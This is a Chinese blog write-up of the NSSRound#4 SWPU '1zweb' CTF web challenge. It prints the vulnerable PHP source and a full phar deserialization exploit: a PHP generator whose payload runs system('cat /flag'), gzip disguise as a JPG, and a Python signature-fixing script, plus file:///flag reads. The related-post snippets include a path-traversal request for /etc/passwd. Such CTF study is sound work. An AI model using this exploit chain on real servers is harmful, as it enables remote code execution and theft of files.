[NSSRound#4 SWPU]1zweb

已于 2023-03-13 21:31:01 修改
阅读量544 收藏
点赞数
文章标签: php 开发语言 web安全
于 2023-03-13 21:22:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_70819573/article/details/129506508
版权

1.打开环境,审计代码。

1.非预期解

直接用file伪协议读取flag,或直接读取flag

file:///flag
/flag

2.正常解

要复杂的多。

可以用读取文件读取index.php,upload.php的源码。

index.php:

<?php
class LoveNss{
    public $ljt;
    public $dky;
    public $cmd;
    public function __construct(){
        $this->ljt="ljt";
        $this->dky="dky";
        phpinfo();
    }
    public function __destruct(){
        if($this->ljt==="Misc"&&$this->dky==="Re")
            eval($this->cmd);
    }
    public function __wakeup(){
        $this->ljt="Re";
        $this->dky="Misc";
    }
}
$file=$_POST['file'];
if(isset($_POST['file'])){
    echo file_get_contents($file);
}

upload.php:

<?php
if ($_FILES["file"]["error"] > 0){
    echo "上传异常";
}
else{
    $allowedExts = array("gif", "jpeg", "jpg", "png");
    $temp = explode(".", $_FILES["file"]["name"]);
    $extension = end($temp);
    if (($_FILES["file"]["size"] && in_array($extension, $allowedExts))){
        $content=file_get_contents($_FILES["file"]["tmp_name"]);
        $pos = strpos($content, "__HALT_COMPILER();");
        if(gettype($pos)==="integer"){
            echo "ltj一眼就发现了phar";
        }else{
            if (file_exists("./upload/" . $_FILES["file"]["name"])){
                echo $_FILES["file"]["name"] . " 文件已经存在";
            }else{
                $myfile = fopen("./upload/".$_FILES["file"]["name"], "w");
                fwrite($myfile, $content);
                fclose($myfile);
                echo "上传成功 ./upload/".$_FILES["file"]["name"];
            }
        }
    }else{
        echo "dky不喜欢这个文件 .".$extension;
    }
}
?>

index.php中只需要绕过_wakeup魔术方法就行了,可以考虑增加自然属性个数或增加属性个数来绕过,因为upload.php会检查stub,所以压缩文件成zip(注意要用winhex改变属性个数,不然签名会改变),用phar://伪协议来读取文件。

phar压缩:

<?php
ini_set("phar.readonly","Off"); 
class LoveNss{
    public $ljt;
    public $dky;
    public $cmd;
    public function __construct(){
        $this->ljt="Misc";
        $this->dky="Re";
        $this->cmd="system('cat /flag');";
    }
}
$a = new LoveNss();
 
$phar = new Phar('aa.phar');
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER(); ? >');
 
$phar->setMetadata($a);
$phar->addFromString('test.txt', 'test');
$phar->stopBuffering();

?>
#注意要手动将php.ini中的phar.readonly改成Off

提交发现文件没有运行,所以考虑可能是压缩文件格式的问题。

用linux命令gzip压缩成gz:

cd 工作目录
gzip aa.phar

得到aa.phar.gz,改文件名为1.jpg上交,用phar读取发现签名损坏,所以要进行签名修复,phar由data,data签名(20位),和签名格式(8位)组成。

修复脚本:

from hashlib import sha1

import gzip

file = open(r'C:\networkSafe\phpstudy_pro\WWW\aa.phar', 'rb').read()

data = file[:-28]  # 获取需要签名的数据
# data = data.replace(b'3:{', b'4:{') #更换属性值,绕过__wakeup

final = file[-8:]  # 获取最后8位GBMB标识和签名类型

newfile = data + sha1(data).digest() + final  # 数据 + 签名 + 类型 + GBMB

open(r'C:\networkSafe\phpstudy_pro\WWW\new.phar', 'wb').write(newfile)  # 写入到新的phar文件

newf = gzip.compress(newfile)
with open(r'C:\networkSafe\phpstudy_pro\WWW\2.jpg', 'wb') as file: #更改文件后缀
     file.write(newf)

最后上交修改后的2.jpg得到flag。

ha0cker
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
swpu前端实验4的实验
04-23
swpu
[NSSRound#4 SWPU]hide_and_seek-复现
liaochonxiang的博客
05-29 158
可以发现下表为0,1,7,8,14,15的位置可能进行了加密,一般猜测为异或。所以我们可以改一下这里的标志寄存器,或者直接nop掉,或者取反。后面一个异或:\x17^未知数=S,未知数=68。在这里下断点,可以看见它会跳到直接结束的地方。记住光标要点击内存处,因为它解密后放到内存里了。前面一个异或:Q^未知数=N,未知数= 31。可以浅显的猜测flag目前加密后的样子为。修改完成后,可以直接运行到快结束的时候。前面不是说这是一个反调试的题目吗。可以仔细观察下面的函数。这是一个反调试的题目。
每日练习-NSSRound#4 SWPU-1zweb
m0_68113265的博客
08-21 177
upload限制了phar文件的上传。同时设置了白名单,只允许png,jpg,gif文件上传.这段代码,对前面的内容或者后缀名是没有要求的,可以直接修改为其他后缀。phar由data,data签名(20位),和签名格式(8位)组成。只要将phar文件使用 gzip 命令进行压缩,这段代码就会消失。php识别phar文件是通过其文件头的stub,更确切一点来说是。生成phar文件,同时放入010增加属性数量来绕过weak_up。接着就是修复phar签名以及压缩。上传成功之后,查询文件。
Web】NSSRound#1-20 Basic 刷题记录(全)
uuzeray的博客
04-11 1728
3、之后执行content.innerHTML = data.message.content,发生报错,执行Error.prepareStackTrace,通过 callsite.getFunction()获取当前调用栈的函数,也就56-65这段的匿名函数,再callsite.getFunction()(),让这段匿名函数再次执行。1、插入了img标签,使得56-65这段匿名函数执行停止,去加载img外部引用,因为没有外部引用,所以触发img的error,执行js代码。提供应用的健康信息。
NSSCTF做题(8)
wwwwyyyrre的博客
10-11 372
看到了js代码有一个base64编码,解密最后发现这是一个加密方式去掉空格之后得到了flag。
文件上传与Phar反序列化的摩擦
Aiwin的博客
11-03 1998
文件上传与Phar反序列化的摩擦和例题
Web】Phar反序列化相关例题wp
uuzeray的博客
11-12 261
标准的phar反序列化file_exists触发贴出构造dirsearch扫出/upload.php,访问可以发现上传文件,但限制只能上传图片问题不大,php识别phar文件是通过其文件头的stub,更确切一点来说是这段代码,对前面的内容或者后缀名是没有要求的,可以直接修改为其他后缀bp抓包改后缀和MIMEphar文件上传成功 ,接下来就是如何触发的问题了过于明显不解释payload:?
[NSSRound#4] 复现
qq_61768489的博客
08-12 1111
可以看到下面的句子跟原棋盘数量一样,也就是我们要给原棋盘涂色,玩完之后能组成下面的句子并且颜色相符。是无法被正常解析的,所以需要修改签名,让他变成一个正常的phar文件还需要对phar文件进行修改。文件的签名是第一次生成文件的时候自动生成的,所以当我们修改数据过后,由于签名错误,这个。将文件压缩为zip文件,并把后缀改为png文件,这样文件内容和后缀白名单检测都绕过了。这里对文件后后缀进行了白名单,也对phar文件内容进行了检测,伪了绕过这两点。zip打不开,是把zip文件头换成rar了,换回去。.....
[NSSRound#4 SWPU]ez_rce
m0_73121489的博客
04-28 481
标签说是CVE-2021-41773(Apache HTTP Server路径穿越漏洞)这里直接cat /flag_is here 是什么都没有的。我一个个试了一遍,在run.sh里面找到了flag的真正位置。dirsearch扫目录也没有扫什么有用的出来。
[SWPUCTF 2022 新生赛]ez_rce、[NSSRound#4 SWPU]ez_rce、[UUCTF 2022 新生赛]ez_rce
weixin_46497491的博客
11-07 3738
[SWPUCTF 2022 新生赛]ez_rce、[NSSRound#4 SWPU]ez_rce
2016 SWPU CTF web1题目源码
10-31
2016 SWPU CTF web1题目源码
2016 SWPU CTF web4
10-31
2016 SWPU CTF web4 题目的源码压缩包,压缩包地址是:http://web4.08067.me/web/web.zip,如果服务器关了就只有这里有了
SWPU大数据概论课程报告
01-31
仅作备份
SWPU学分绩点计算器女生版
02-06
SWPU 学分绩点 计算器 女生版 所谓女生版就是指的GUI稍微美化了一点点,我承认是标题党....
【phar反序列化学习】
最新发布
hcja666的博客
04-12 1108
phar反序列化皮毛学习。
NSSCTF web题记录
m0_64815693的博客
11-08 9341
[GXYCTF 2019]BabyUpload [GKCTF 2020]CheckIN [NISACTF 2022]babyserialize [NISACTF 2022]popchains [NSSRound#4 SWPU]1zweb prize_p1 prize_p5 [NISACTF 2022]middlerce [SWPUCTF 2021 新生赛]babyunser [TQLCTF 2022]simple_bypass
nssctf round#4
weixin_63231007的博客
08-21 1182
curl -v --path-as-is 目标地址:端口/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd。怎么通过脚本直接修改这个phar文件里序列化好的数据来绕过wakeup这部分我不清楚,查看wp之后需要生成phar文件后,自己手动修改文件数据,用到脚本修改签名。文件的签名是第一次生成文件的时候自动生成的,所以当我们修改数据过后,由于签名错误,这个。
NSSCTF Round#4
qq_62046696的博客
08-18 320
上传后用phar伪协议读取,格式phar://文件上传的路径.phar.phar 自己设置的名称。感觉不太完整,也没反序列化,脑子里第一想的会不会是构建一个phar包,自动实现序列化这种。打开界面感觉这道题和上一个一样,有查询文件的功能,直接查询flag,签到提。步骤没错,可是缺乏考虑,wp中说,这里制造了一个文件夹迷宫,仅存在四层。搜一下有,2.4.49有目录遍及的漏洞,和以前做的一道题几乎一样。}这里冲突,应该会绕过wakeup,大于属性个数,以上都是自己的分析,看完wp。.
数据增强实测之Hide-and-Seek
一个菜鸟的奋斗
02-07 3919
Hide-and-Seek是2017年发表在ICCV上的一种数据增强方法,主要思想是将图像划分成若干个patch,然后对每个patch执行随机擦除操作。会议扩充版看格式有可能是投到TPAMI上了,从时间上分析,被拒的可能性比较大。
[SWPUCTF 2018]SimplePHP
07-28
回答: \[1\]中的代码片段是一个PHP代码示例,其中定义了三个类C1e4r、Show和Test,并创建了相应的对象。\[2\]中的代码片段是一个PHP文件,它包含了一些文件操作和类的实例化。\[3\]中的代码片段是一个POC(Proof of Concept)示例,用于演示一个可能的漏洞利用场景。根据提供的信息,这个问题可能是关于SWPUCTF 2018比赛中的一个题目,题目名称为"SimplePHP"。然而,由于提供的引用内容不完整,无法给出更具体的答案。如果您有关于这个问题的更多信息,请提供更多的上下文,以便我能够更好地回答您的问题。 #### 引用[.reference_title] - *1* [[SWPUCTF 2018]SimplePHP_wp](https://blog.csdn.net/lzu_lfl/article/details/127802053)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [[SWPUCTF 2018]SimplePHP](https://blog.csdn.net/shinygod/article/details/124002143)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [[SWPUCTF 2018]SimplePHP--一道简单的Phar反序列化题目](https://blog.csdn.net/qq_41401434/article/details/125323752)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值